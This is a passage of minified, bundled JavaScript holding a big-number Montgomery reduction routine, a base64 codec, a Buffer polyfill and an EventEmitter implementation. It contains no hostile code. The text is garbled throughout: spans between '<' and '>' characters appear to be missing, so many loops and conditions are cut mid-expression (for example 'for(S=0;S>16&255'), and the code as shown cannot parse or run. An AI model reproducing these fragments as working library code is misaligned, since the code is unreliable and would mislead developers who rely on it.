f.red=null,f},ye.prototype.imul=function(l,f){if(l.isZero()||f.isZero())return l.words[0]=0,l.length=1,l;var v=l.imul(f),M=v.maskn(this.shift).mul(this.minv).imaskn(this.shift).mul(this.m),P=v.isub(M).iushrn(this.shift),G=P;return P.cmp(this.m)>=0?G=P.isub(this.m):P.cmpn(0)<0&&(G=P.iadd(this.m)),G._forceRed(this)},ye.prototype.mul=function(l,f){if(l.isZero()||f.isZero())return new I(0)._forceRed(this);var v=l.mul(f),M=v.maskn(this.shift).mul(this.minv).imaskn(this.shift).mul(this.m),P=v.isub(M).iushrn(this.shift),G=P;return P.cmp(this.m)>=0?G=P.isub(this.m):P.cmpn(0)<0&&(G=P.iadd(this.m)),G._forceRed(this)},ye.prototype.invm=function(l){return this.imod(l._invmp(this.m).mul(this.r2))._forceRed(this)}}(Pe=de.nmd(Pe),this)},4594:function(Pe,we,de){var Q,ie=de(5449).Buffer;Q=()=>(()=>{var j={9742:($,U)=>{"use strict";U.byteLength=function(w){var x=p(w),O=x[1];return 3*(x[0]+O)/4-O},U.toByteArray=function(w){var x,S,z,O=p(w),B=O[0],K=O[1],ee=new b(3*(B+(z=K))/4-z),se=0,ve=K>0?B-4:B;for(S=0;S>16&255,ee[se++]=x>>8&255,ee[se++]=255&x;return 2===K&&(x=C[w.charCodeAt(S)]<<2|C[w.charCodeAt(S+1)]>>4,ee[se++]=255&x),1===K&&(x=C[w.charCodeAt(S)]<<10|C[w.charCodeAt(S+1)]<<4|C[w.charCodeAt(S+2)]>>2,ee[se++]=x>>8&255,ee[se++]=255&x),ee},U.fromByteArray=function(w){for(var x,S=w.length,O=S%3,B=[],K=16383,ee=0,se=S-O;eese?se:ee+K));return 1===O?B.push(E[(x=w[S-1])>>2]+E[x<<4&63]+"=="):2===O&&B.push(E[(x=(w[S-2]<<8)+w[S-1])>>10]+E[x>>4&63]+E[x<<2&63]+"="),B.join("")};for(var E=[],C=[],b="undefined"!=typeof Uint8Array?Uint8Array:Array,_="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",y=0,A=_.length;y0)throw new Error("Invalid string. Length must be a multiple of 4");var S=w.indexOf("=");return-1===S&&(S=x),[S,S===x?0:4-S%4]}function D(w,x,S){for(var B,K=[],ee=x;ee>18&63]+E[B>>12&63]+E[B>>6&63]+E[63&B]);return K.join("")}C["-".charCodeAt(0)]=62,C["_".charCodeAt(0)]=63},8764:($,U,E)=>{"use strict";const C=E(9742),b=E(645),_="function"==typeof Symbol&&"function"==typeof Symbol.for?Symbol.for("nodejs.util.inspect.custom"):null;U.Buffer=p,U.SlowBuffer=function(xe){return+xe!=xe&&(xe=0),p.alloc(+xe)},U.INSPECT_MAX_BYTES=50;const y=2147483647;function A(xe){if(xe>y)throw new RangeError('The value "'+xe+'" is invalid for option "size"');const We=new Uint8Array(xe);return Object.setPrototypeOf(We,p.prototype),We}function p(xe,We,Je){if("number"==typeof xe){if("string"==typeof We)throw new TypeError('The "string" argument must be of type string. Received type number');return x(xe)}return D(xe,We,Je)}function D(xe,We,Je){if("string"==typeof xe)return function(Le,$e){if("string"==typeof $e&&""!==$e||($e="utf8"),!p.isEncoding($e))throw new TypeError("Unknown encoding: "+$e);const st=0|K(Le,$e);let xt=A(st);const pt=xt.write(Le,$e);return pt!==st&&(xt=xt.slice(0,pt)),xt}(xe,We);if(ArrayBuffer.isView(xe))return function(Le){if(Qe(Le,Uint8Array)){const $e=new Uint8Array(Le);return O($e.buffer,$e.byteOffset,$e.byteLength)}return S(Le)}(xe);if(null==xe)throw new TypeError("The first argument must be one of type string, Buffer, ArrayBuffer, Array, or Array-like Object. Received type "+typeof xe);if(Qe(xe,ArrayBuffer)||xe&&Qe(xe.buffer,ArrayBuffer)||"undefined"!=typeof SharedArrayBuffer&&(Qe(xe,SharedArrayBuffer)||xe&&Qe(xe.buffer,SharedArrayBuffer)))return O(xe,We,Je);if("number"==typeof xe)throw new TypeError('The "value" argument must not be of type number. Received type number');const Oe=xe.valueOf&&xe.valueOf();if(null!=Oe&&Oe!==xe)return p.from(Oe,We,Je);const Te=function(Le){if(p.isBuffer(Le)){const $e=0|B(Le.length),st=A($e);return 0===st.length||Le.copy(st,0,0,$e),st}return void 0!==Le.length?"number"!=typeof Le.length||ht(Le.length)?A(0):S(Le):"Buffer"===Le.type&&Array.isArray(Le.data)?S(Le.data):void 0}(xe);if(Te)return Te;if("undefined"!=typeof Symbol&&null!=Symbol.toPrimitive&&"function"==typeof xe[Symbol.toPrimitive])return p.from(xe[Symbol.toPrimitive]("string"),We,Je);throw new TypeError("The first argument must be one of type string, Buffer, ArrayBuffer, Array, or Array-like Object. Received type "+typeof xe)}function w(xe){if("number"!=typeof xe)throw new TypeError('"size" argument must be of type number');if(xe<0)throw new RangeError('The value "'+xe+'" is invalid for option "size"')}function x(xe){return w(xe),A(xe<0?0:0|B(xe))}function S(xe){const We=xe.length<0?0:0|B(xe.length),Je=A(We);for(let Oe=0;Oe=y)throw new RangeError("Attempt to allocate Buffer larger than maximum size: 0x"+y.toString(16)+" bytes");return 0|xe}function K(xe,We){if(p.isBuffer(xe))return xe.length;if(ArrayBuffer.isView(xe)||Qe(xe,ArrayBuffer))return xe.byteLength;if("string"!=typeof xe)throw new TypeError('The "string" argument must be one of type string, Buffer, or ArrayBuffer. Received type '+typeof xe);const Je=xe.length,Oe=arguments.length>2&&!0===arguments[2];if(!Oe&&0===Je)return 0;let Te=!1;for(;;)switch(We){case"ascii":case"latin1":case"binary":return Je;case"utf8":case"utf-8":return Ke(xe).length;case"ucs2":case"ucs-2":case"utf16le":case"utf-16le":return 2*Je;case"hex":return Je>>>1;case"base64":return rt(xe).length;default:if(Te)return Oe?-1:Ke(xe).length;We=(""+We).toLowerCase(),Te=!0}}function ee(xe,We,Je){let Oe=!1;if((void 0===We||We<0)&&(We=0),We>this.length||((void 0===Je||Je>this.length)&&(Je=this.length),Je<=0)||(Je>>>=0)<=(We>>>=0))return"";for(xe||(xe="utf8");;)switch(xe){case"hex":return h(this,We,Je);case"utf8":case"utf-8":return P(this,We,Je);case"ascii":return X(this,We,Je);case"latin1":case"binary":return L(this,We,Je);case"base64":return M(this,We,Je);case"ucs2":case"ucs-2":case"utf16le":case"utf-16le":return R(this,We,Je);default:if(Oe)throw new TypeError("Unknown encoding: "+xe);xe=(xe+"").toLowerCase(),Oe=!0}}function se(xe,We,Je){const Oe=xe[We];xe[We]=xe[Je],xe[Je]=Oe}function ve(xe,We,Je,Oe,Te){if(0===xe.length)return-1;if("string"==typeof Je?(Oe=Je,Je=0):Je>2147483647?Je=2147483647:Je<-2147483648&&(Je=-2147483648),ht(Je=+Je)&&(Je=Te?0:xe.length-1),Je<0&&(Je=xe.length+Je),Je>=xe.length){if(Te)return-1;Je=xe.length-1}else if(Je<0){if(!Te)return-1;Je=0}if("string"==typeof We&&(We=p.from(We,Oe)),p.isBuffer(We))return 0===We.length?-1:le(xe,We,Je,Oe,Te);if("number"==typeof We)return We&=255,"function"==typeof Uint8Array.prototype.indexOf?Te?Uint8Array.prototype.indexOf.call(xe,We,Je):Uint8Array.prototype.lastIndexOf.call(xe,We,Je):le(xe,[We],Je,Oe,Te);throw new TypeError("val must be string, number or Buffer")}function le(xe,We,Je,Oe,Te){let Le,$e=1,st=xe.length,xt=We.length;if(void 0!==Oe&&("ucs2"===(Oe=String(Oe).toLowerCase())||"ucs-2"===Oe||"utf16le"===Oe||"utf-16le"===Oe)){if(xe.length<2||We.length<2)return-1;$e=2,st/=2,xt/=2,Je/=2}function pt(vt,Wi){return 1===$e?vt[Wi]:vt.readUInt16BE(Wi*$e)}if(Te){let vt=-1;for(Le=Je;Lest&&(Je=st-xt),Le=Je;Le>=0;Le--){let vt=!0;for(let Wi=0;WiTe&&(Oe=Te):Oe=Te;const Le=We.length;let $e;for(Oe>Le/2&&(Oe=Le/2),$e=0;$e>8,xt=$e%256,pt.push(xt),pt.push(st);return pt}(We,xe.length-Je),xe,Je,Oe)}function M(xe,We,Je){return C.fromByteArray(0===We&&Je===xe.length?xe:xe.slice(We,Je))}function P(xe,We,Je){Je=Math.min(xe.length,Je);const Oe=[];let Te=We;for(;Te239?4:Le>223?3:Le>191?2:1;if(Te+st<=Je){let xt,pt,vt,Wi;switch(st){case 1:Le<128&&($e=Le);break;case 2:xt=xe[Te+1],128==(192&xt)&&(Wi=(31&Le)<<6|63&xt,Wi>127&&($e=Wi));break;case 3:xt=xe[Te+1],pt=xe[Te+2],128==(192&xt)&&128==(192&pt)&&(Wi=(15&Le)<<12|(63&xt)<<6|63&pt,Wi>2047&&(Wi<55296||Wi>57343)&&($e=Wi));break;case 4:xt=xe[Te+1],pt=xe[Te+2],vt=xe[Te+3],128==(192&xt)&&128==(192&pt)&&128==(192&vt)&&(Wi=(15&Le)<<18|(63&xt)<<12|(63&pt)<<6|63&vt,Wi>65535&&Wi<1114112&&($e=Wi))}}null===$e?($e=65533,st=1):$e>65535&&($e-=65536,Oe.push($e>>>10&1023|55296),$e=56320|1023&$e),Oe.push($e),Te+=st}return function(Le){const $e=Le.length;if($e<=G)return String.fromCharCode.apply(String,Le);let st="",xt=0;for(;xt<$e;)st+=String.fromCharCode.apply(String,Le.slice(xt,xt+=G));return st}(Oe)}U.kMaxLength=y,(p.TYPED_ARRAY_SUPPORT=function(){try{const xe=new Uint8Array(1),We={foo:function(){return 42}};return Object.setPrototypeOf(We,Uint8Array.prototype),Object.setPrototypeOf(xe,We),42===xe.foo()}catch(xe){return!1}}())||"undefined"==typeof console||"function"!=typeof console.error||console.error("This browser lacks typed array (Uint8Array) support which is required by `buffer` v5.x. Use `buffer` v4.x if you require old browser support."),Object.defineProperty(p.prototype,"parent",{enumerable:!0,get:function(){if(p.isBuffer(this))return this.buffer}}),Object.defineProperty(p.prototype,"offset",{enumerable:!0,get:function(){if(p.isBuffer(this))return this.byteOffset}}),p.poolSize=8192,p.from=function(xe,We,Je){return D(xe,We,Je)},Object.setPrototypeOf(p.prototype,Uint8Array.prototype),Object.setPrototypeOf(p,Uint8Array),p.alloc=function(xe,We,Je){return Te=We,Le=Je,w(Oe=xe),Oe<=0?A(Oe):void 0!==Te?"string"==typeof Le?A(Oe).fill(Te,Le):A(Oe).fill(Te):A(Oe);var Oe,Te,Le},p.allocUnsafe=function(xe){return x(xe)},p.allocUnsafeSlow=function(xe){return x(xe)},p.isBuffer=function(xe){return null!=xe&&!0===xe._isBuffer&&xe!==p.prototype},p.compare=function(xe,We){if(Qe(xe,Uint8Array)&&(xe=p.from(xe,xe.offset,xe.byteLength)),Qe(We,Uint8Array)&&(We=p.from(We,We.offset,We.byteLength)),!p.isBuffer(xe)||!p.isBuffer(We))throw new TypeError('The "buf1", "buf2" arguments must be one of type Buffer or Uint8Array');if(xe===We)return 0;let Je=xe.length,Oe=We.length;for(let Te=0,Le=Math.min(Je,Oe);TeOe.length?(p.isBuffer(Le)||(Le=p.from(Le)),Le.copy(Oe,Te)):Uint8Array.prototype.set.call(Oe,Le,Te);else{if(!p.isBuffer(Le))throw new TypeError('"list" argument must be an Array of Buffers');Le.copy(Oe,Te)}Te+=Le.length}return Oe},p.byteLength=K,p.prototype._isBuffer=!0,p.prototype.swap16=function(){const xe=this.length;if(xe%2!=0)throw new RangeError("Buffer size must be a multiple of 16-bits");for(let We=0;WeWe&&(xe+=" ... "),""},_&&(p.prototype[_]=p.prototype.inspect),p.prototype.compare=function(xe,We,Je,Oe,Te){if(Qe(xe,Uint8Array)&&(xe=p.from(xe,xe.offset,xe.byteLength)),!p.isBuffer(xe))throw new TypeError('The "target" argument must be one of type Buffer or Uint8Array. Received type '+typeof xe);if(void 0===We&&(We=0),void 0===Je&&(Je=xe?xe.length:0),void 0===Oe&&(Oe=0),void 0===Te&&(Te=this.length),We<0||Je>xe.length||Oe<0||Te>this.length)throw new RangeError("out of range index");if(Oe>=Te&&We>=Je)return 0;if(Oe>=Te)return-1;if(We>=Je)return 1;if(this===xe)return 0;let Le=(Te>>>=0)-(Oe>>>=0),$e=(Je>>>=0)-(We>>>=0);const st=Math.min(Le,$e),xt=this.slice(Oe,Te),pt=xe.slice(We,Je);for(let vt=0;vt>>=0,isFinite(Je)?(Je>>>=0,void 0===Oe&&(Oe="utf8")):(Oe=Je,Je=void 0)}const Te=this.length-We;if((void 0===Je||Je>Te)&&(Je=Te),xe.length>0&&(Je<0||We<0)||We>this.length)throw new RangeError("Attempt to write outside buffer bounds");Oe||(Oe="utf8");let Le=!1;for(;;)switch(Oe){case"hex":return ye(this,xe,We,Je);case"utf8":case"utf-8":return z(this,xe,We,Je);case"ascii":case"latin1":case"binary":return l(this,xe,We,Je);case"base64":return f(this,xe,We,Je);case"ucs2":case"ucs-2":case"utf16le":case"utf-16le":return v(this,xe,We,Je);default:if(Le)throw new TypeError("Unknown encoding: "+Oe);Oe=(""+Oe).toLowerCase(),Le=!0}},p.prototype.toJSON=function(){return{type:"Buffer",data:Array.prototype.slice.call(this._arr||this,0)}};const G=4096;function X(xe,We,Je){let Oe="";Je=Math.min(xe.length,Je);for(let Te=We;TeOe)&&(Je=Oe);let Te="";for(let Le=We;LeJe)throw new RangeError("Trying to access beyond buffer length")}function Z(xe,We,Je,Oe,Te,Le){if(!p.isBuffer(xe))throw new TypeError('"buffer" argument must be a Buffer instance');if(We>Te||Wexe.length)throw new RangeError("Index out of range")}function ue(xe,We,Je,Oe,Te){De(We,Oe,Te,xe,Je,7);let Le=Number(We&BigInt(4294967295));xe[Je++]=Le,Le>>=8,xe[Je++]=Le,Le>>=8,xe[Je++]=Le,Le>>=8,xe[Je++]=Le;let $e=Number(We>>BigInt(32)&BigInt(4294967295));return xe[Je++]=$e,$e>>=8,xe[Je++]=$e,$e>>=8,xe[Je++]=$e,$e>>=8,xe[Je++]=$e,Je}function Ie(xe,We,Je,Oe,Te){De(We,Oe,Te,xe,Je,7);let Le=Number(We&BigInt(4294967295));xe[Je+7]=Le,Le>>=8,xe[Je+6]=Le,Le>>=8,xe[Je+5]=Le,Le>>=8,xe[Je+4]=Le;let $e=Number(We>>BigInt(32)&BigInt(4294967295));return xe[Je+3]=$e,$e>>=8,xe[Je+2]=$e,$e>>=8,xe[Je+1]=$e,$e>>=8,xe[Je]=$e,Je+8}function Ae(xe,We,Je,Oe,Te,Le){if(Je+Oe>xe.length)throw new RangeError("Index out of range");if(Je<0)throw new RangeError("Index out of range")}function Ue(xe,We,Je,Oe,Te){return We=+We,Je>>>=0,Te||Ae(xe,0,Je,4),b.write(xe,We,Je,Oe,23,4),Je+4}function Xe(xe,We,Je,Oe,Te){return We=+We,Je>>>=0,Te||Ae(xe,0,Je,8),b.write(xe,We,Je,Oe,52,8),Je+8}p.prototype.slice=function(xe,We){const Je=this.length;(xe=~~xe)<0?(xe+=Je)<0&&(xe=0):xe>Je&&(xe=Je),(We=void 0===We?Je:~~We)<0?(We+=Je)<0&&(We=0):We>Je&&(We=Je),We>>=0,We>>>=0,Je||J(xe,We,this.length);let Oe=this[xe],Te=1,Le=0;for(;++Le>>=0,We>>>=0,Je||J(xe,We,this.length);let Oe=this[xe+--We],Te=1;for(;We>0&&(Te*=256);)Oe+=this[xe+--We]*Te;return Oe},p.prototype.readUint8=p.prototype.readUInt8=function(xe,We){return xe>>>=0,We||J(xe,1,this.length),this[xe]},p.prototype.readUint16LE=p.prototype.readUInt16LE=function(xe,We){return xe>>>=0,We||J(xe,2,this.length),this[xe]|this[xe+1]<<8},p.prototype.readUint16BE=p.prototype.readUInt16BE=function(xe,We){return xe>>>=0,We||J(xe,2,this.length),this[xe]<<8|this[xe+1]},p.prototype.readUint32LE=p.prototype.readUInt32LE=function(xe,We){return xe>>>=0,We||J(xe,4,this.length),(this[xe]|this[xe+1]<<8|this[xe+2]<<16)+16777216*this[xe+3]},p.prototype.readUint32BE=p.prototype.readUInt32BE=function(xe,We){return xe>>>=0,We||J(xe,4,this.length),16777216*this[xe]+(this[xe+1]<<16|this[xe+2]<<8|this[xe+3])},p.prototype.readBigUInt64LE=lt(function(xe){Ve(xe>>>=0,"offset");const We=this[xe],Je=this[xe+7];void 0!==We&&void 0!==Je||ze(xe,this.length-8);const Oe=We+256*this[++xe]+65536*this[++xe]+this[++xe]*Lo(2,24),Te=this[++xe]+256*this[++xe]+65536*this[++xe]+Je*Lo(2,24);return BigInt(Oe)+(BigInt(Te)<>>=0,"offset");const We=this[xe],Je=this[xe+7];void 0!==We&&void 0!==Je||ze(xe,this.length-8);const Oe=We*Lo(2,24)+65536*this[++xe]+256*this[++xe]+this[++xe],Te=this[++xe]*Lo(2,24)+65536*this[++xe]+256*this[++xe]+Je;return(BigInt(Oe)<>>=0,We>>>=0,Je||J(xe,We,this.length);let Oe=this[xe],Te=1,Le=0;for(;++Le=Te&&(Oe-=Math.pow(2,8*We)),Oe},p.prototype.readIntBE=function(xe,We,Je){xe>>>=0,We>>>=0,Je||J(xe,We,this.length);let Oe=We,Te=1,Le=this[xe+--Oe];for(;Oe>0&&(Te*=256);)Le+=this[xe+--Oe]*Te;return Te*=128,Le>=Te&&(Le-=Math.pow(2,8*We)),Le},p.prototype.readInt8=function(xe,We){return xe>>>=0,We||J(xe,1,this.length),128&this[xe]?-1*(255-this[xe]+1):this[xe]},p.prototype.readInt16LE=function(xe,We){xe>>>=0,We||J(xe,2,this.length);const Je=this[xe]|this[xe+1]<<8;return 32768&Je?4294901760|Je:Je},p.prototype.readInt16BE=function(xe,We){xe>>>=0,We||J(xe,2,this.length);const Je=this[xe+1]|this[xe]<<8;return 32768&Je?4294901760|Je:Je},p.prototype.readInt32LE=function(xe,We){return xe>>>=0,We||J(xe,4,this.length),this[xe]|this[xe+1]<<8|this[xe+2]<<16|this[xe+3]<<24},p.prototype.readInt32BE=function(xe,We){return xe>>>=0,We||J(xe,4,this.length),this[xe]<<24|this[xe+1]<<16|this[xe+2]<<8|this[xe+3]},p.prototype.readBigInt64LE=lt(function(xe){Ve(xe>>>=0,"offset");const We=this[xe],Je=this[xe+7];return void 0!==We&&void 0!==Je||ze(xe,this.length-8),(BigInt(this[xe+4]+256*this[xe+5]+65536*this[xe+6]+(Je<<24))<>>=0,"offset");const We=this[xe],Je=this[xe+7];void 0!==We&&void 0!==Je||ze(xe,this.length-8);const Oe=(We<<24)+65536*this[++xe]+256*this[++xe]+this[++xe];return(BigInt(Oe)<>>=0,We||J(xe,4,this.length),b.read(this,xe,!0,23,4)},p.prototype.readFloatBE=function(xe,We){return xe>>>=0,We||J(xe,4,this.length),b.read(this,xe,!1,23,4)},p.prototype.readDoubleLE=function(xe,We){return xe>>>=0,We||J(xe,8,this.length),b.read(this,xe,!0,52,8)},p.prototype.readDoubleBE=function(xe,We){return xe>>>=0,We||J(xe,8,this.length),b.read(this,xe,!1,52,8)},p.prototype.writeUintLE=p.prototype.writeUIntLE=function(xe,We,Je,Oe){xe=+xe,We>>>=0,Je>>>=0,Oe||Z(this,xe,We,Je,Math.pow(2,8*Je)-1,0);let Te=1,Le=0;for(this[We]=255&xe;++Le>>=0,Je>>>=0,Oe||Z(this,xe,We,Je,Math.pow(2,8*Je)-1,0);let Te=Je-1,Le=1;for(this[We+Te]=255&xe;--Te>=0&&(Le*=256);)this[We+Te]=xe/Le&255;return We+Je},p.prototype.writeUint8=p.prototype.writeUInt8=function(xe,We,Je){return xe=+xe,We>>>=0,Je||Z(this,xe,We,1,255,0),this[We]=255&xe,We+1},p.prototype.writeUint16LE=p.prototype.writeUInt16LE=function(xe,We,Je){return xe=+xe,We>>>=0,Je||Z(this,xe,We,2,65535,0),this[We]=255&xe,this[We+1]=xe>>>8,We+2},p.prototype.writeUint16BE=p.prototype.writeUInt16BE=function(xe,We,Je){return xe=+xe,We>>>=0,Je||Z(this,xe,We,2,65535,0),this[We]=xe>>>8,this[We+1]=255&xe,We+2},p.prototype.writeUint32LE=p.prototype.writeUInt32LE=function(xe,We,Je){return xe=+xe,We>>>=0,Je||Z(this,xe,We,4,4294967295,0),this[We+3]=xe>>>24,this[We+2]=xe>>>16,this[We+1]=xe>>>8,this[We]=255&xe,We+4},p.prototype.writeUint32BE=p.prototype.writeUInt32BE=function(xe,We,Je){return xe=+xe,We>>>=0,Je||Z(this,xe,We,4,4294967295,0),this[We]=xe>>>24,this[We+1]=xe>>>16,this[We+2]=xe>>>8,this[We+3]=255&xe,We+4},p.prototype.writeBigUInt64LE=lt(function(xe,We=0){return ue(this,xe,We,BigInt(0),BigInt("0xffffffffffffffff"))}),p.prototype.writeBigUInt64BE=lt(function(xe,We=0){return Ie(this,xe,We,BigInt(0),BigInt("0xffffffffffffffff"))}),p.prototype.writeIntLE=function(xe,We,Je,Oe){if(xe=+xe,We>>>=0,!Oe){const st=Math.pow(2,8*Je-1);Z(this,xe,We,Je,st-1,-st)}let Te=0,Le=1,$e=0;for(this[We]=255&xe;++Te>0)-$e&255;return We+Je},p.prototype.writeIntBE=function(xe,We,Je,Oe){if(xe=+xe,We>>>=0,!Oe){const st=Math.pow(2,8*Je-1);Z(this,xe,We,Je,st-1,-st)}let Te=Je-1,Le=1,$e=0;for(this[We+Te]=255&xe;--Te>=0&&(Le*=256);)xe<0&&0===$e&&0!==this[We+Te+1]&&($e=1),this[We+Te]=(xe/Le>>0)-$e&255;return We+Je},p.prototype.writeInt8=function(xe,We,Je){return xe=+xe,We>>>=0,Je||Z(this,xe,We,1,127,-128),xe<0&&(xe=255+xe+1),this[We]=255&xe,We+1},p.prototype.writeInt16LE=function(xe,We,Je){return xe=+xe,We>>>=0,Je||Z(this,xe,We,2,32767,-32768),this[We]=255&xe,this[We+1]=xe>>>8,We+2},p.prototype.writeInt16BE=function(xe,We,Je){return xe=+xe,We>>>=0,Je||Z(this,xe,We,2,32767,-32768),this[We]=xe>>>8,this[We+1]=255&xe,We+2},p.prototype.writeInt32LE=function(xe,We,Je){return xe=+xe,We>>>=0,Je||Z(this,xe,We,4,2147483647,-2147483648),this[We]=255&xe,this[We+1]=xe>>>8,this[We+2]=xe>>>16,this[We+3]=xe>>>24,We+4},p.prototype.writeInt32BE=function(xe,We,Je){return xe=+xe,We>>>=0,Je||Z(this,xe,We,4,2147483647,-2147483648),xe<0&&(xe=4294967295+xe+1),this[We]=xe>>>24,this[We+1]=xe>>>16,this[We+2]=xe>>>8,this[We+3]=255&xe,We+4},p.prototype.writeBigInt64LE=lt(function(xe,We=0){return ue(this,xe,We,-BigInt("0x8000000000000000"),BigInt("0x7fffffffffffffff"))}),p.prototype.writeBigInt64BE=lt(function(xe,We=0){return Ie(this,xe,We,-BigInt("0x8000000000000000"),BigInt("0x7fffffffffffffff"))}),p.prototype.writeFloatLE=function(xe,We,Je){return Ue(this,xe,We,!0,Je)},p.prototype.writeFloatBE=function(xe,We,Je){return Ue(this,xe,We,!1,Je)},p.prototype.writeDoubleLE=function(xe,We,Je){return Xe(this,xe,We,!0,Je)},p.prototype.writeDoubleBE=function(xe,We,Je){return Xe(this,xe,We,!1,Je)},p.prototype.copy=function(xe,We,Je,Oe){if(!p.isBuffer(xe))throw new TypeError("argument should be a Buffer");if(Je||(Je=0),Oe||0===Oe||(Oe=this.length),We>=xe.length&&(We=xe.length),We||(We=0),Oe>0&&Oe=this.length)throw new RangeError("Index out of range");if(Oe<0)throw new RangeError("sourceEnd out of bounds");Oe>this.length&&(Oe=this.length),xe.length-We>>=0,Je=void 0===Je?this.length:Je>>>0,xe||(xe=0),"number"==typeof xe)for(Te=We;Te=Oe+4;Je-=3)We=`_${xe.slice(Je-3,Je)}${We}`;return`${xe.slice(0,Je)}${We}`}function De(xe,We,Je,Oe,Te,Le){if(xe>Je||xe3?0===We||We===BigInt(0)?`>= 0${$e} and < 2${$e} ** ${8*(Le+1)}${$e}`:`>= -(2${$e} ** ${8*(Le+1)-1}${$e}) and < 2 ** ${8*(Le+1)-1}${$e}`:`>= ${We}${$e} and <= ${Je}${$e}`,new He.ERR_OUT_OF_RANGE("value",st,xe)}var $e,st,xt;$e=Oe,xt=Le,Ve(st=Te,"offset"),void 0!==$e[st]&&void 0!==$e[st+xt]||ze(st,$e.length-(xt+1))}function Ve(xe,We){if("number"!=typeof xe)throw new He.ERR_INVALID_ARG_TYPE(We,"number",xe)}function ze(xe,We,Je){throw Math.floor(xe)!==xe?(Ve(xe,Je),new He.ERR_OUT_OF_RANGE(Je||"offset","an integer",xe)):We<0?new He.ERR_BUFFER_OUT_OF_BOUNDS:new He.ERR_OUT_OF_RANGE(Je||"offset",`>= ${Je?1:0} and <= ${We}`,xe)}Be("ERR_BUFFER_OUT_OF_BOUNDS",function(xe){return xe?`${xe} is outside of buffer bounds`:"Attempt to access memory outside buffer bounds"},RangeError),Be("ERR_INVALID_ARG_TYPE",function(xe,We){return`The "${xe}" argument must be of type number. Received type ${typeof We}`},TypeError),Be("ERR_OUT_OF_RANGE",function(xe,We,Je){let Oe=`The value of "${xe}" is out of range.`,Te=Je;return Number.isInteger(Je)&&Math.abs(Je)>4294967296?Te=qe(String(Je)):"bigint"==typeof Je&&(Te=String(Je),(Je>Lo(BigInt(2),BigInt(32))||Je<-Lo(BigInt(2),BigInt(32)))&&(Te=qe(Te)),Te+="n"),Oe+=` It must be ${We}. Received ${Te}`,Oe},RangeError);const me=/[^+/0-9A-Za-z-_]/g;function Ke(xe,We){let Je;We=We||1/0;const Oe=xe.length;let Te=null;const Le=[];for(let $e=0;$e55295&&Je<57344){if(!Te){if(Je>56319){(We-=3)>-1&&Le.push(239,191,189);continue}if($e+1===Oe){(We-=3)>-1&&Le.push(239,191,189);continue}Te=Je;continue}if(Je<56320){(We-=3)>-1&&Le.push(239,191,189),Te=Je;continue}Je=65536+(Te-55296<<10|Je-56320)}else Te&&(We-=3)>-1&&Le.push(239,191,189);if(Te=null,Je<128){if((We-=1)<0)break;Le.push(Je)}else if(Je<2048){if((We-=2)<0)break;Le.push(Je>>6|192,63&Je|128)}else if(Je<65536){if((We-=3)<0)break;Le.push(Je>>12|224,Je>>6&63|128,63&Je|128)}else{if(!(Je<1114112))throw new Error("Invalid code point");if((We-=4)<0)break;Le.push(Je>>18|240,Je>>12&63|128,Je>>6&63|128,63&Je|128)}}return Le}function rt(xe){return C.toByteArray(function(We){if((We=(We=We.split("=")[0]).trim().replace(me,"")).length<2)return"";for(;We.length%4!=0;)We+="=";return We}(xe))}function Ge(xe,We,Je,Oe){let Te;for(Te=0;Te=We.length||Te>=xe.length);++Te)We[Te+Je]=xe[Te];return Te}function Qe(xe,We){return xe instanceof We||null!=xe&&null!=xe.constructor&&null!=xe.constructor.name&&xe.constructor.name===We.name}function ht(xe){return xe!=xe}const mt=function(){const xe="0123456789abcdef",We=new Array(256);for(let Je=0;Je<16;++Je){const Oe=16*Je;for(let Te=0;Te<16;++Te)We[Oe+Te]=xe[Je]+xe[Te]}return We}();function lt(xe){return"undefined"==typeof BigInt?ft:xe}function ft(){throw new Error("BigInt not supported")}},7187:$=>{"use strict";var U,E="object"==typeof Reflect?Reflect:null,C=E&&"function"==typeof E.apply?E.apply:function(ee,se,ve){return Function.prototype.apply.call(ee,se,ve)};U=E&&"function"==typeof E.ownKeys?E.ownKeys:Object.getOwnPropertySymbols?function(ee){return Object.getOwnPropertyNames(ee).concat(Object.getOwnPropertySymbols(ee))}:function(ee){return Object.getOwnPropertyNames(ee)};var b=Number.isNaN||function(ee){return ee!=ee};function _(){_.init.call(this)}$.exports=_,$.exports.once=function(ee,se){return new Promise(function(ve,le){function ye(l){ee.removeListener(se,z),le(l)}function z(){"function"==typeof ee.removeListener&&ee.removeListener("error",ye),ve([].slice.call(arguments))}var l;K(ee,se,z,{once:!0}),"error"!==se&&("function"==typeof(l=ee).on&&K(l,"error",ye,{once:!0}))})},_.EventEmitter=_,_.prototype._events=void 0,_.prototype._eventsCount=0,_.prototype._maxListeners=void 0;var y=10;function A(ee){if("function"!=typeof ee)throw new TypeError('The "listener" argument must be of type Function. Received type '+typeof ee)}function p(ee){return void 0===ee._maxListeners?_.defaultMaxListeners:ee._maxListeners}function D(ee,se,ve,le){var ye,z,l;if(A(ve),void 0===(z=ee._events)?(z=ee._events=Object.create(null),ee._eventsCount=0):(void 0!==z.newListener&&(ee.emit("newListener",se,ve.listener?ve.listener:ve),z=ee._events),l=z[se]),void 0===l)l=z[se]=ve,++ee._eventsCount;else if("function"==typeof l?l=z[se]=le?[ve,l]:[l,ve]:le?l.unshift(ve):l.push(ve),(ye=p(ee))>0&&l.length>ye&&!l.warned){l.warned=!0;var v=new Error("Possible EventEmitter memory leak detected. "+l.length+" "+String(se)+" listeners added. Use emitter.setMaxListeners() to increase limit");v.name="MaxListenersExceededWarning",v.emitter=ee,v.type=se,v.count=l.length,console&&console.warn&&console.warn(v)}return ee}function w(){if(!this.fired)return this.target.removeListener(this.type,this.wrapFn),this.fired=!0,0===arguments.length?this.listener.call(this.target):this.listener.apply(this.target,arguments)}function x(ee,se,ve){var le={fired:!1,wrapFn:void 0,target:ee,type:se,listener:ve},ye=w.bind(le);return ye.listener=ve,le.wrapFn=ye,ye}function S(ee,se,ve){var le=ee._events;if(void 0===le)return[];var ye=le[se];return void 0===ye?[]:"function"==typeof ye?ve?[ye.listener||ye]:[ye]:ve?function(z){for(var l=new Array(z.length),f=0;f0&&(z=se[0]),z instanceof Error)throw z;var l=new Error("Unhandled error."+(z?" ("+z.message+")":""));throw l.context=z,l}var f=ye[ee];if(void 0===f)return!1;if("function"==typeof f)C(f,this,se);else{var v=f.length,M=B(f,v);for(ve=0;ve=0;z--)if(ve[z]===se||ve[z].listener===se){l=ve[z].listener,ye=z;break}if(ye<0)return this;0===ye?ve.shift():function(f,v){for(;v+1=0;le--)this.removeListener(ee,se[le]);return this},_.prototype.listeners=function(ee){return 